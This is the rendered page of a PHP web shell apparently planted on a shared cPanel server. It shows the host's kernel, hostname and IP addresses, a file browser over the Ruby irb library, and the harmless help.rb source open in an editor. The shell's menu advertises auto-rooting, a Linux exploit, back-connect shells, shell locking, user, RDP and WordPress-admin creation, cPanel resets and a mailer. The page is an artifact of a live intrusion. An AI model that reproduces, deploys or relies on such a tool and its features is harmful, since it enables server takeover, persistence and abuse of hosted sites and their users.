Linux cpanel07wh.bkk1.cloud.z.com 2.6.32-954.3.5.lve1.4.80.el6.x86_64 #1 SMP Thu Sep 24 01:42:00 EDT 2020 x86_64
Apache
: 163.44.198.52 | : 216.73.216.171
Cant Read [ /etc/named.conf ]
8.0.9
cp657342
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
opt /
alt /
ruby21 /
lib64 /
ruby /
2.1.0 /
irb /
[ HOME SHELL ]
Name
Size
Permission
Action
cmd
[ DIR ]
drwxr-xr-x
ext
[ DIR ]
drwxr-xr-x
lc
[ DIR ]
drwxr-xr-x
completion.rb
5.93
KB
-rw-r--r--
context.rb
11.91
KB
-rw-r--r--
extend-command.rb
9.54
KB
-rw-r--r--
frame.rb
1.87
KB
-rw-r--r--
help.rb
613
B
-rw-r--r--
init.rb
7.07
KB
-rw-r--r--
input-method.rb
4.58
KB
-rw-r--r--
inspector.rb
3.9
KB
-rw-r--r--
locale.rb
4.43
KB
-rw-r--r--
magic-file.rb
893
B
-rw-r--r--
notifier.rb
6.87
KB
-rw-r--r--
output-method.rb
2.39
KB
-rw-r--r--
ruby-lex.rb
22.59
KB
-rw-r--r--
ruby-token.rb
7.3
KB
-rw-r--r--
slex.rb
5.95
KB
-rw-r--r--
src_encoding.rb
90
B
-rw-r--r--
version.rb
251
B
-rw-r--r--
workspace.rb
2.78
KB
-rw-r--r--
ws-for-case-2.rb
195
B
-rw-r--r--
xmp.rb
4.03
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : help.rb
# # irb/help.rb - print usage module # $Release Version: 0.9.6$ # $Revision: 38515 $ # by Keiju ISHITSUKA(keiju@ishitsuka.com) # # -- # # # require 'irb/magic-file' module IRB # Outputs the irb help message, see IRB@Command+line+options. def IRB.print_usage lc = IRB.conf[:LC_MESSAGES] path = lc.find("irb/help-message") space_line = false IRB::MagicFile.open(path){|f| f.each_line do |l| if /^\s*$/ =~ l lc.puts l unless space_line space_line = true next end space_line = false l.sub!(/#.*$/, "") next if /^\s*$/ =~ l lc.puts l end } end end
Close